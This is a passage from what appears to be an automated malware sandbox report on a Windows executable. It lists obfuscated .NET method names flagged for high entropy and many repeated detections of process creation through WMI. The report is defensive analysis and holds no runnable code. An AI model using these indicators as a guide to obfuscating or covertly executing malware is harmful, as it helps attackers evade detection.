Source: ppXCre3i9k.exe, DOOB1INfqYDoTb0nIb.cs High entropy of concatenated method names: 'miwFhyIs8', 'ufos7D3fG', 'eWQypPFKt', 'oCT9oiAUW', 'CdCkdZk0M', 'W6JdqpFB5', 'u6TgMc9pL', 'fdrtKPK6YrTkRAAJCJa', 'HlXniEKOrX6NYJiUCjG', 'bWdtvNKIcRtqCo20tuh'
Source: ppXCre3i9k.exe, EUXkOM9ztVPSQwsLRj6.cs High entropy of concatenated method names: 'jHBuk1HlX3', 'nIbud5ieG2', 'QwKugiVRIE', 'lfrIc8VNHN3EGSuayT1', 'x7vIN7VEJg2wX1YvMx9', 'EhCW8jVJRoURZ2gcbkW', 'nDqBDFVfGTnWTo1WcVe', 'Kyrq4gVoBiLAVyhYvKP', 'TN3QRbVk9wtsAwQGbIR', 'KpT2FWVZ2EmaFkTT3lt'
Source: ppXCre3i9k.exe, VxZ9C89lTGRcLZH0xyn.cs High entropy of concatenated method names: 'EZCZVqpaUR', 'g6aZv3FrWA', 'lMtZ5UMY2o', 'Q5hknh2Z0MEvIM7jRe1', 'EERw0J2Dk9qNrFKMNKc', 'lyuCi12poDCPIctACnT', 'rkwoeY21OrPoqjMtdJs', 'WGpgIv2tSG3cI8ZBlwj', 'gOU0aW2aw0cWE4L7xyh', 'Yb44FZ2yt2EsZjJpxgH'
Source: ppXCre3i9k.exe, dnduiHSvcNBNXlgYP9.cs High entropy of concatenated method names: '_8Ok', 'YZ8', 'InF', 'G9C', 'Of9jE2942j0b7MsyPbb', 'dBChwQ9vkymt4VZTWaT', 'EJeUiB9A19Vd2vG3iKO', 'm6A8Q89xOJiC0eLPmDa', 'qrrBKN909Ir0We1lXWt', 'qKdoLK9F1MgSmFmfuwj'
Source: ppXCre3i9k.exe, wtIeWtVFTRSc2I1nclW.cs High entropy of concatenated method names: '_625', 'YZ8', '_9pX', 'G9C', 'vvgvEcn2SFAms7MyCYA', 'BsQ500nl1nRmlO8Ee7Y', 'hmvmOOnHcSwFB16bEdE', 'GmcWvRnYQsf7661VGs8', 'lQrEGInVXk75J2tJguc', 'USLHkjnq2nSrZOJESGp'
Source: ppXCre3i9k.exe, RP94oIVvs9LujPko6BR.cs High entropy of concatenated method names: 'K55', 'YZ8', '_9yX', 'G9C', 'WFHgUBPZV3UaZBxCrY7', 'd83hFAPDVO095IEpVMg', 'nhZWWJPpN3Ibd5bLvRm', 'jXWKcLP1JBjXFkrc5r1', 'a89bHoPtyLx77oFdXQn', 'z0sqBQPaWCXuUNtnfBL'
Source: ppXCre3i9k.exe, eHfe6j7t1ZSrySqGyWO.cs High entropy of concatenated method names: 'bSfgMtGSAL', '_1kO', '_9v4', '_294', 'Ry8gb3fnTe', 'euj', 'UhVgFKVuq3', 'Jrsgs9hI1H', 'o87', 'lgvgy0asxt'
Source: ppXCre3i9k.exe, pKpOri9FHRxfKs6UAmX.cs High entropy of concatenated method names: '_9YY', '_57I', 'w51', 'GqdKcxerD2', '_168', 'j45kQ7YqVWNNbiUBo9g', 'hlfZC3Y3n0kjREesyXE', 'F6TkNZYjRKePtwdBSmW', 'invntDYiAEeOU1U6mtN', 'BeXDpUYSRuS3BZskFtM'
Source: ppXCre3i9k.exe, mUgLc4ChjwuY615WsY9.cs High entropy of concatenated method names: '_45b', 'ne2', '_115', '_3vY', 'OxOD23OO9l', '_3il', 'r5lDYmLFMR', 'zjnDNipOIL', '_78N', 'z3K'
Source: ppXCre3i9k.exe, ydFfZnCtrVdGPu9moMx.cs High entropy of concatenated method names: 'P29', '_3xW', 'bOP', 'Th1', '_36d', 'PiHXGuk6Ge', 'zZrXaKhAV1', 'r8j', 'LS1', '_55S'
Source: ppXCre3i9k.exe, Ru4Mpa9h7uj1sHDEcsG.cs High entropy of concatenated method names: 'NYp1tLLkkZ', 'omV1QGaPM8', 'YdqD6tH0ICf94XIeRX8', 'Y8vl1SHFI3u7WHXZC0L', 'qt8TpyHAWvWYvAB8RSG', 'ynCd6ZHx07jRlbUxM37', 'vxbW31HdGmMRQDhx3D2', 'XKfWJhH292aWswAvEZi'
Source: ppXCre3i9k.exe, tlObvtG29ELmu5wwS8.cs High entropy of concatenated method names: 'P37', 'YZ8', 'b2I', 'G9C', 'ppyNsrgoYtO2eHflOdM', 'WGVKoOgkMBe0j7WmMUj', 'zGPcuTgZrXtOsANYFdA', 'mIS5GXgDbbmDEOFVXri', 'bsBUuJgpuyi5xuyOMSS', 'AoUiwkg1f3eAoMr6dcg'
Source: ppXCre3i9k.exe, rA6yr5CYAsLna2M7Z6r.cs High entropy of concatenated method names: '_7zt', 'uKQJPuvq9m', 'YTMJWvBYT2', 'dtlJH5r258', 't7AJA9KtEP', 'NPnJMKXSoe', 'Q0eJbge3Ij', 'v85HEk3HYN572regwou', 'RDgmlS3YgQxZ1iFU4Lu', 'AKLf0K32sgiqKGFFLXW'
Source: ppXCre3i9k.exe, hp2qB89D0A7N5hwFmGW.cs High entropy of concatenated method names: '_269', '_5E7', 'xCAKokfq7r', 'Mz8', 'D52Kdv0U0n', 'rJXhI2YaX91qsuHo6MR', 'hR4C5rYy1XtZMNqkhPu', 'jTO60OYmKgDnmnh6eRx', 'qxGJZrYsTQ8GpfTNjjW', 'SUOw0FYbQBAZKd4iDuL'
Source: ppXCre3i9k.exe, UpofdTTiCapNJ5lF3Tc.cs High entropy of concatenated method names: 'n2Y4TWYYCZXNQ', 'ievKPrZ4UMbUEYqU92Z', 'WJyh5ZZvVMMHt2tjiRa', 'H85HaYZA9BluuaW6T0D', 'II0PSBZxW7Djki4VDwH', 'G3B0uFZ0vxyduIIQOlf', 'hciaADZhAKpedJ91kl2', 'PGLMiDZXBvxa3xMyPoX', 'sfoU8DZF9r4aMoSASLd', 'CtJuaqZduC1D5jGCk9h'
Source: ppXCre3i9k.exe, ml004dC8doJDPrh5V0e.cs High entropy of concatenated method names: 'uNeSinsDLq', 'iDESjfqON5', 'BsXS47xcdP', 'FxISTNOtPK', 'bBvSBGGVu9', 'kENWrmq8fnP0LtQ8b3N', 'kEFEftqzABYDxcgNdbp', 'FPHC14qU5yYbH9LP9ox', 'VghXRTqRZLSFjTBZQT9', 'EpnX1x3LZqr5MUFLoRU'
Source: ppXCre3i9k.exe, otp74DfGuaZ4bJnSMZ.cs High entropy of concatenated method names: '_468', 'YZ8', '_2M1', 'G9C', 'Hp3m17gxT6J7VkECa3P', 'sIWo9og0GW2TtasvNNT', 'usKt4MgFrxVW2UpIWwn', 'f61sQUgdu08wdoslamI', 'zme1Okg2JhHfEQ5n6nh', 'v2apJ9glq0WiDhgQJoU'
Source: ppXCre3i9k.exe, bTbcVqvsI6fuc7LSkWv.cs High entropy of concatenated method names: 'x2KFLvWN4t', 'Iy2FOVxv5X', 'XD8Fw18YwX', 'Bg8FUJYbSF', 'XehFrkneov', 'TetFcQdPKJ', 'u0e6oirpppi7JleFw80', 'SHkOodrZnS1dKHGyRCo', 'e1lWdSrDiXG7fkdQq2f', 'jOuuCVr1dHTwbJ4lyEc'
Source: ppXCre3i9k.exe, geadX3CXYjr0HKbvnLS.cs High entropy of concatenated method names: 'XeNJ3lox1b', 'CLsJokobAI', 'XUqJxFiToD', 's3vHbL3AscRVaHEuw2c', 's1AytH3xur3jBbWbs9p', 'e8yZKo34qV5FxXgYdBU', 'yBdvKr3vRWwZZS4cwr1', 'RyFPec30LkFWQAkjVQ8', 'vyJUj13Fv3yAqYxRy0G', 'E4S3m63dNMAgTdOR3yv'
Source: ppXCre3i9k.exe, ge555tV876Kg6aNZ9VI.cs High entropy of concatenated method names: 'd43', 'YZ8', 'g67', 'G9C', 'J3QwalMj8wZRlxOagEJ', 'LUoPnSMiOYgs7ve6Y2b', 'gmTB3ZMSSLE7J6ywgok', 'f55K7iMQb58N6u12QmW', 'Qx4EwjMGbXnLna668Y6', 'jmpHuiM7WOVhJDo6x9i'
Source: ppXCre3i9k.exe, Sa3LXtxFs2yxaYkUSQ.cs High entropy of concatenated method names: '_66K', 'YZ8', 'O46', 'G9C', 'JoZYyFgnne6d3SiMebu', 'armoYBgcl4Pvsa0IZpl', 'aTgoS9gB44Rhix4yYvI', 'qKO2yKghOj7ZQrYBWej', 'M8jAFLgX7Ih9wwODw4E', 'n9H1bag4vMtpH8FYTGB'
Source: ppXCre3i9k.exe, RnWTLbCvtmYFnttjEE4.cs High entropy of concatenated method names: 'rs5SCFCkUd', 'dXWmPvq09AF2jAlSiIO', 'JD7TYEqFNnhbWFH1UuF', 'nD5p26qA58o9skmVWFK', 'hm1medqxtjhxIQRxies', 'LcJuqdodyy', 'EtGump6bsa', 'Xcaut1BN4q', 'naCuQT7iTd', 'iXLunkjUFD'
Source: ppXCre3i9k.exe, KHb2tACnmqDDcgHseYp.cs High entropy of concatenated method names: 'odOGsuLOoP', 'OxHG9j0cwK', 'qK1GDyIKkk', 'VG9GX5b2ti', 'GlCGGQG9sW', 'yNmGaagg2a', 'dLZGCRQirw', 'CoKG70sxZy', 'E53GEN6gsZ', 'FjnGPJPfFb'
Source: ppXCre3i9k.exe, rFDSDCv9wwCPLBEiY4i.cs High entropy of concatenated method names: 'fC18XLTHmZlCPTxcUw7', 'WIwwNvTYV6BjcHF0hcA', 'uF6Cf0T2moX3LWXohfF', 'StXAJDTl7NUecsOfa0w', 'yFtWFg8w1x', 'LKIg9DT3ejkA0tKvu0D', 'pU3xQQTjZQ1uphfccoP', 'PHWhvdTVjbDkVkB3TLu', 'vOUwYfTqImygo3jvjZk', 'CmjY6hTiE6i5h3iwD6k'
Source: ppXCre3i9k.exe, of6xa37PthnkkTLsgi7.cs High entropy of concatenated method names: 'pGa91QCkIV', 'WTy9uVwhof', 'ODM98Gtffk', '_3Gf', '_4XH', '_3mv', '_684', '_555', 'Z9E', 'So19S6HH2B'
Source: ppXCre3i9k.exe, KNdNj8nYwmAc9mn5v7.cs High entropy of concatenated method names: '_88Z', 'YZ8', 'ffV', 'G9C', 'rbptiO9kpniD9fLT0iG', 'Q19YFF9Zdwa6MO85I6i', 'PDgYvH9Dku6CQkKyeck', 'MsqBl49p8PkuSlCJ9v7', 'o11WkP91x38Mso7FSHV', 'yF7ULP9to0WwtJFTEsJ'
Source: ppXCre3i9k.exe, yLh7yk9qNeHpeBprZpv.cs High entropy of concatenated method names: 'YPbZLqxtl8', 'NIeZOnJjI5', 'daBZwtMpbA', 'jVPZUfM4OC', 'rRTZrqMTgP', 'jqGlJZlPg0xSfukKT40', 'tr8JwqlMs5vbN4ZKlMY', 'IcuN6wlgYd1OgvfUcpu', 'faPMsml91MS4fQeCM5A', 'lbBu7Vl6hK1B5JGoHZB'
Source: ppXCre3i9k.exe, VMi7RMVJSEblraIvsso.cs High entropy of concatenated method names: 'NovNMNPdHW', 'TktNbfdWbS', 'aHwNF7bQma', 'LZTeBBcnNWoPdjk6NnA', 'OMsBnrcOI0LosDZVVsR', 'YwpudLcI3nxKdxm29UA', 'kPLpr0ccLVB9MTpRiQX', 'R4Rh1EcBIXQAM4QxqUU', 'EU49n3chfrTLW8M8ITW', 'cR6yhqcXoKUI4mCkpsH'
Source: ppXCre3i9k.exe, Ye14Wv9GUmBBMhFc5bL.cs High entropy of concatenated method names: 'oYo', '_1Z5', 'KO2KPL5MwN', 'zdqu3vrHMq', 'PTGKhLn07G', 'z4p0tFYhBeTVKcWmDit', 'YLmDBaYXp3y1q8smG7H', 'mmVAg7Y4aLcDeGLjui4', 'RxUbEGYvmfa9NFoKrKl', 'dqGeuyYAQTtrVPGXV6H'
Source: ppXCre3i9k.exe, z2l5alViccsZGoLabyo.cs High entropy of concatenated method names: '_6U6', 'YZ8', '_694', 'G9C', 'SUtUsPMFou79nyjFm3b', 'A208AfMd8nuqSiAIk59', 'zd1foMM2LOjtEvfJ6s0', 'pIao9WMltH7MVX2v7Nu', 'bNjM07MHM14w7uk4w92', 'TWwtZ4MYCFtVZumTrXm'
Source: ppXCre3i9k.exe, G6SiHHvymI1u2CuLE9a.cs High entropy of concatenated method names: 'SiKFTPxSUR', 'FlPFBMMW62', 'YmtFIrPCdE', 'tTtFfoH1c1', 'lLLFKJ2ujd', 'bhcUM1rinrIlinv8IHH', 'RD6cDkr3JYRkVESew4F', 'tHsTxOrjr0KHkBoa9Tu', 'NBBpeMrSAd0HqFdqRbS', 'sTUiHqrQjdLMmA9A36f'
Source: ppXCre3i9k.exe, ARCALFCgTP1BnwpvQih.cs High entropy of concatenated method names: 'ICU', 'j9U', 'IBK', '_6qM', 'Amn', 'Mc2', 'og6', 'z6i', '_5G6', 'r11'
Source: ppXCre3i9k.exe, si5wHu9C91yILgea00O.cs High entropy of concatenated method names: 'Vmx0fsD7BS', 'HEI0KUTliH', 'hTF0RoFHIf', 'IoS0lwJlqZ', 'mqM0peVT1R', 'vms06A8pKS', 'CtsTb5FS2d0ruxPxKlf', 'OZMxEgFjvF23aTbPycB', 'tRi1OkFiYRuoTmrrA45', 'T9QLt1FQxfY1F4CCoph'
Source: ppXCre3i9k.exe, TdF4AuvkcNnANxI5h8F.cs High entropy of concatenated method names: 'q4Y', '_71O', '_6H6', 'yBpsbc4AdQ', '_13H', 'I64', '_67a', '_71t', 'fEj', '_9OJ'
Source: ppXCre3i9k.exe, eN8spZBYTxcZdiiBPHG.cs High entropy of concatenated method names: 'CIvhzZ8YHf', 'EOo32jXdXK', 'SFP3YT5wg7', 'Apx3NJRWfl', 'f1E3hyntiM', 'tkF33dq4lG', 'v5g3o8cLoG', 'QXd3xgl3j6', 'X2030b7xJ7', 'deY3ZnoqjT'
Source: ppXCre3i9k.exe, Ot3DGPD0EybH9C8PZ7.cs High entropy of concatenated method names: 'pHw', 'YZ8', 'v2R', 'G9C', 'WvlNq79iOT4VtrAko2i', 'N62RTE9SPnkT2OBcnFV', 'Nh3NGs9QZHIHfLTV3XT', 'TAuYrr9GHS5F8kEFv53', 'ccbv8c97y9RNb2gPd5y', 'ud39Lx9T3lBGIcfZnMl'
Source: ppXCre3i9k.exe, k9x06dBmLCL8eHEoMae.cs High entropy of concatenated method names: 'sh03D39iiH', 'vhs3Xn7UIO', 'kJG5rH4VaDrCMo2AwYF', 'lJWg9G4qZp1R0bYQaR6', 'x3j6kZ4H1PisSh7ocN4', 'LCm3yG4Y7mpEMQ5LCiN', 's4Tgsh43PDEAt0AVXin', 'UKpTlg4jDYunLPFXGvI', 'EYKoff4ia2bEhXpTfhn', 'j12ybH4Suh0Fs3Pxomf'
Source: ppXCre3i9k.exe, ywayqqBaHCuUQvxi6MZ.cs High entropy of concatenated method names: 'L6JhUSYBxp', 'mloFQgXwBMxQZMUOLeM', 'Lpyn1vXgpDw5LsICOIr', 'Ja39ggXK64RbXMfX3MI', 'LiMFLRX5DG2PTH5ivGS', 'Tt0hfGX9phjLwRWjn97', 'pYMmE9XP9nyJn6puKkT', 'GlTMdOXMsZ2WFYKV7Tf', 'CQrVf1X6hbMO5xivb7Q', 'n3VSaXXOpMMR5Ap79iq'
Source: ppXCre3i9k.exe, zmdUepVArV885qtR5co.cs High entropy of concatenated method names: 'gHL', 'YZ8', 'vF9', 'G9C', 'r05kqu6V9rkrxQ2lIkP', 'uXPPkl6qeJXS0bTnUWY', 'PORrkO63fW2v9fUjPQu', 'w3DeMo6jh4Vffijhjto', 'lUT3NV6iUmxpoVI1GJN', 'CGWMjq6SGQ8nAZrsnlg'
Source: ppXCre3i9k.exe, gxHE8XrSpQNXwGOBq8.cs High entropy of concatenated method names: '_59M', 'YZ8', '_1zA', 'G9C', 'FkZ3JUweUG32lYfBiJY', 'G0H1QgwrX85qF7vXhXc', 'IOsQ6EwCXYotgNMp2Ub', 'GHvHtgwJx3MJtr9QUl7', 'kPIiKpwf9KjFKK7leYK', 'bXwXK2wND40MpBQfUyA'
Source: ppXCre3i9k.exe, pKLWeSCDVwAUyqCRZLN.cs High entropy of concatenated method names: 'UtuXcMhqPy', 'TjUXnGGDEL', 'eVRXiEtGH4', 'etJXjsU55F', 'qtVX4jCV8I', 'OR1XThK9p2', 'rGBXBmF8KQ', 'WAjXIjfwme', 'OoeXfjdd6M', 'Wf0XKZrNcw'
Source: ppXCre3i9k.exe, Wi0MBrBrIEjcLOc6tU5.cs High entropy of concatenated method names: '_0023Nn', 'Dispose', 'ganonAAL80', 'ig9oiuir2x', 'kGaojN1ESg', 'YGeo4hb8gD', 'fEpoT6Cq9w', 'XP6LWfxO0c3BGjZQX7W', 'q3qZMFxIwwH317BFleh', 'uMaVdLxMMlB1lJWLpZr'
Source: ppXCre3i9k.exe, CB8CXD98IZS9aSVrHtf.cs High entropy of concatenated method names: '_223', 'aM3t622xrMPwE6GX0jN', 'D3i5Kk20a4AJJT8tvw1', 'gWwHul2FGrTeaB9HNaA', 'IfijEf2dfXpRqLHacp4', 'Jw9OKi22UYKlLjl7LWS', 'irwVCV2l6eQ7IP8yPtV', 'XBZy8p2HNS5cwvrrqix', 'gEqQTt2YKfg7hYfBhml', 'TMYIN02VlZ8oe13a52K'
Source: ppXCre3i9k.exe, Uu4aBo75DUyICkEYtXd.cs High entropy of concatenated method names: 'IGD', 'CV5', 'BEdyFTrGyu', '_3k4', 'elq', 'hlH', 'yc1', 'Y17', '_2QC', 'En1'
Source: ppXCre3i9k.exe, mhGQ3uVHtOT6CZmet1P.cs High entropy of concatenated method names: '_3fO', 'YZ8', '_48A', 'G9C', 'F4eiMRMM0jG48dZuEt9', 'yeUMRWM6B8WMKv1Zulj', 'w2EynvMOlgDQ8HsOgFi', 'RXVvhMMIoO3XggaGpXQ', 'YjQlnlMnsm7BMJit52l', 'Ug4HVtMcpP7K0nVkDjW'
Source: ppXCre3i9k.exe, xDmTMY9dyDCG3oatx68.cs High entropy of concatenated method names: 'p40ZQk4H0w', 'Yk8Zn0OTq9', 'AE4ZiH3wN8', 'eJPcVG2XZMUN9MRdl9Y', 'SWEBQ52BCVfsr5hZkiU', 'PiKSZX2hyvfUv27yJ9d', 'mLr3g424a3t1yfqtXbE', 'oi3ZGekuvP', 's3aZaParlZ', 'XWtZCKDipp'
Source: ppXCre3i9k.exe, N0pJXnv0nm6rv0koaSf.cs High entropy of concatenated method names: 'fqTF6vy16A', 'VUMFVq56L2', 'iAAFvsCq0L', 'WSx1Iwrfw6pnZdGeFN2', 'nhHc9SrCmTkabD6TDxD', 'hcRtkkrJRiW8Yhd1I3l', 'q5FQc4rN772AjF9DRiU', 'xTsc4lrExyatltFfXOp', 'TZSx7jrobUHa9EKT9uX', 'Jkp63srktIFVvI8oqXk'
Source: ppXCre3i9k.exe, sAKros2yZcqCV7sT03.cs High entropy of concatenated method names: '_23T', 'YZ8', 'ELp', 'G9C', 'Qiwj0iwbKpdygfuoJpv', 'Qop47YwUKfFuP95FNOD', 'GatOUGwRtIHHQ6U9dE8', 'iviHjnw8P9hGhCNByMr', 'BcnxGOwztUQsM7ZBNca', 'mvAp5dgLTs7g4aGQF3T'
Source: ppXCre3i9k.exe, cwouRC9VecUZhNVobin.cs High entropy of concatenated method names: 'bN40gEW92g', 'zrM0q8goaM', 'vdE0mjLbNZ', 'aAV0tj96Zy', 'yHEFaU0z3h8fwlr7XTv', 'zZmEIQ0RiNwvnIefRce', 'e1etdC08yW8NgRgY1cu', 'SLYrivFLimadmHDhCHl', 'Qt4QPEFKxvJkaoq3gKa', 'vgBPB1F5cOUyWpd2Z5P'
Source: ppXCre3i9k.exe, LrdB5wF83XoYCciA9a.cs High entropy of concatenated method names: 'kcq', 'YZ8', '_4bQ', 'G9C', 'CarJur9PAhDadii4Iwh', 'KSKHoU9MOOYqJpavucM', 'PDk2EJ96YyddwZ1IuJT', 'GBqj8g9OrQ6UATsCxAr', 'XkY5Um9ItvjlKsTVo2v', 'hhpKUs9nuy0GiW30WKq'
Source: ppXCre3i9k.exe, kUKGBmVrUUSCUQGYaqK.cs High entropy of concatenated method names: 'ASjYcYe2DZ', 'Pnhmc0IrDlQomegEZRA', 'eqAX6IICJ4VT9KJg8R0', 'gZ1a2EIui9qPHNPfd8b', 'zXC2L2IeB1YTZHZiLKx', 'fK0BJsIJOVP6vKKaDfD', '_3Xh', 'YZ8', '_123', 'G9C'
Source: ppXCre3i9k.exe, Iyh4IAV9E85q1JhHJo0.cs High entropy of concatenated method names: 'R1x', 'YZ8', '_8U7', 'G9C', 'hK1YH9PQQdqaX4WogAp', 'Ayv0YjPG5VhDWp7rTXm', 'SR1lboP7SBuus0G2Z1x', 'bdlh1HPTGrjyjlmtHch', 'y92LxuPWkNIetflu7ro', 'jVjtlVPu9CE0VGgWB90'
Source: ppXCre3i9k.exe, xU3kf7ZfONoqWkIvci.cs High entropy of concatenated method names: '_52Y', 'YZ8', 'Eg4', 'G9C', 'IERBEX4mA', 'IU7wpV5FlKpuENixN1X', 'e0uSli5d0Ojm74r2NpL', 'fBP1qV52GA1Q0GG3DJJ', 'tWf5c05lyBuvs7fiXFf', 'jEjUBt5H0hY6GY9fhQY'
Source: ppXCre3i9k.exe, a1LFFb3qWWpMjn9Xpl.cs High entropy of concatenated method names: '_3OK', 'YZ8', '_321', 'G9C', 'o0HB9s5R92ZMJi9Z9Jy', 'tbBBt658qE22dugoIAD', 'EXDQub5zJ519rXxdmLH', 'Y8Xp2UwLymA0g6EKeA1', 'KPYQfTwKbfF8BZ2fE0H', 'xXebbew573ENMRl2uir'
Source: ppXCre3i9k.exe, dNSnYyBQSFvPs5RVp3u.cs High entropy of concatenated method names: 'z0YogQlqg8', 'HEVdKBARTWjAQjIJrk0', 'R57TigA8jM5fUBbXryc', 'Kk1YaLAbQr4xfvCZSoZ', 'VhwcAOAUTlrXEP52jsp', 'Xr4aY4AzMIKGfEP84ex', 'TFgcjrxLZVeLW2IShXD', 'cKl279xKyIBkvaip0H4', 'OdEqqYx5RLYaX3lTE4X', 'nWbvBYxw8DoLmwaBloc'
Source: ppXCre3i9k.exe, i0GISGgFfZTamweoF6.cs High entropy of concatenated method names: '_52U', 'YZ8', 'M5A', 'G9C', 'zO5pmh9mqdNcKquF97H', 'NmeM719sRFYIgWebYGQ', 'LrV4VP9bR1qo9q7no0x', 'B8vcwD9UMbVXLitskdH', 'GPce3u9RsAAt3V0ytgk', 'nRkyNn98JBkOxODjTuN'
Source: ppXCre3i9k.exe, RR5tOlBXjugpOPXakws.cs High entropy of concatenated method names: 'Wvihc7oQxl', 'zBfheaUXDV', 'EWo7SCXFHgMGqEREnNH', 'amr4QcXdZbbHdOHeis3', 'Cwd3YKX2Hl9dD226pZM', 'dmEZUiXlC8A9aA4yKkB', 'akbRYNXHA6Uefu0niCr', 'LgufMCXYZaVf1OKqk0M', 'y7ukAXXVDZPLRCVk0Ck', 'oP01Z1XqECA4kVOilj5'
Source: ppXCre3i9k.exe, P6wRHiT07ReKaRvlGb.cs High entropy of concatenated method names: 'tblDAjQOc', 'gv9GoXTMvM3GVQvJtg', 'xuUkt7GnZa9AksXB9o', 'sqTVGi7fa8DV0rW8an', 'ua62XhWCyAqgeXNEpF', 'zeHcD5uCT8WsSanjN8', 'XGlNjThxW', 'rVThUimmG', 'S533G7H0T', 'xXqoUIS5h'
Source: ppXCre3i9k.exe, PNxa4kVaOuTHnAiykaw.cs High entropy of concatenated method names: 'rU3', 'YZ8', 'M54', 'G9C', 'uXyrrCMJi1aEtfmHc4v', 'T5M8GeMfc7Zf6RklauY', 't84lHXMNWGX6G1FaodL', 'xbxYtbMErmO3CRb9WQs', 'jXw4eCMorcLWBLBnt10', 'hoCmMKMkepJZtWCfVFa'
Source: ppXCre3i9k.exe, xikwL4C6u99tI9jj9Ef.cs High entropy of concatenated method names: 'rpJJQVFWVo', 'ffhJnBWGpJ', 'Hf0Ji2y8F7', 'BrwJjZ4epx', 'IemJ4BGF52', 'PXhF8n3ugWwiNnCDLqe', 'Acav4i3eWVrqcUTcBl4', 'FKRqwC3TwhlVdaKgABp', 'qsVkw33WQgburs4ZX3U', 'l5sphy3rr89bE2GyQvy'
Source: ppXCre3i9k.exe, qBQanVVPOhcDms1MHAD.cs High entropy of concatenated method names: 'GvP', 'YZ8', 'bp6', 'G9C', 'lepic5Oe2KLEDtUv9gw', 'cISBVgOrPD1lAwlSSBn', 'JEaE4rOC1s69wtKjCgl', 'NubwkPOJMakJuaUvEaR', 'S3lUQLOfwdFd8RqbvBW', 'kobfIJONfiXo1qTSmiX'
Source: ppXCre3i9k.exe, vAJDIpVqmXw4kLbXHu3.cs High entropy of concatenated method names: 'yiQ', 'YZ8', '_5li', 'G9C', 'fmMlpA6LRG9UE31x1c4', 'f0vW9W6KOxACZcVdadC', 'AJ6QRw65M7q1gR80Y14', 'hiDqSV6wbIEMnmwGK51', 'jdDCMh6gKyEjDSCTm5g', 'VgektE6924q53P3T8WK'
Source: ppXCre3i9k.exe, WuC7U3v1ynPyJH1F7ey.cs High entropy of concatenated method names: 'GybLRuC9BDBOlvHA6LY', 'gZlEGXCPF7tDFOMYkoT', 'IvQsA0CwClRkqSwpPQX', 'qarpWUCgVCKyJHemaLf', 'gRJH4MCMfMIrG4CRkVB', 'sWQyvGC6flhlxi8d4Zy', 'Yp3JufCOsdSfpWHLid2'
Source: ppXCre3i9k.exe, fkL1qjvHJLZfyGdfLZY.cs High entropy of concatenated method names: 'kvxFWVmIoo', 'jISFHfp9cn', 'XmceqPemhaYC2LUGgeH', 'ytqPTVesQo7edVmCApY', 'c1ghdVeb9slMks2M2yB', 'To7cnFeUb9E87ZUURlU', 'XPr45JeR4bjlXlgLFsD', 'iZYq4Ue8BZ5wlBIspZ7', 'pej64GezDgOlybBi8r6', 'dhSHTMrLD4BOtc5wFBJ'
Source: ppXCre3i9k.exe, Kv1ywN7RvIY4uxVRu8L.cs High entropy of concatenated method names: 'QMoslJnLtC', 'K7qspdIeqb', 'GUNs6JYvt4', 'gPYsViXQRX', 'VcTsv0ocu6', 'zXRs5DyNZ3', '_838', 'vVb', 'g24', '_9oL'
Source: ppXCre3i9k.exe, Oww24jz9lCyvK7yorW.cs High entropy of concatenated method names: 'Y29', 'YZ8', 'jn6', 'G9C', 'KFF2gYPwysOEujJFA5f', 'yaiNj3Pgr2PK7Xmj4Qf', 'I86aDCP9Syirmsj4242', 'U4q42oPPbT9IqFEdAr7', 'orRXj1PMQDB0wHVfqLb', 'PBabbuP67nD0PGrNxmU'
Source: ppXCre3i9k.exe, hokL8J7LLtFKSSPuyQp.cs High entropy of concatenated method names: '_7tu', '_8ge', 'DyU', '_58f', '_254', '_6Q3', '_7f4', 'B3I', '_75k', 'd4G'

Persistence and Installation Behavior
barindex
Creates processes via WMI
Source: C:\Users\user\Desktop\ppXCre3i9k.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\ppXCre3i9k.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\ppXCre3i9k.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\ppXCre3i9k.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\ppXCre3i9k.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\ppXCre3i9k.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\ppXCre3i9k.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\ppXCre3i9k.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\ppXCre3i9k.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\ppXCre3i9k.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\ppXCre3i9k.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\ppXCre3i9k.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\ppXCre3i9k.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\ppXCre3i9k.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\ppXCre3i9k.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\ppXCre3i9k.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\ppXCre3i9k.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\ppXCre3i9k.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\ppXCre3i9k.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\ppXCre3i9k.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\ppXCre3i9k.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\ppXCre3i9k.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\ppXCre3i9k.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\ppXCre3i9k.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
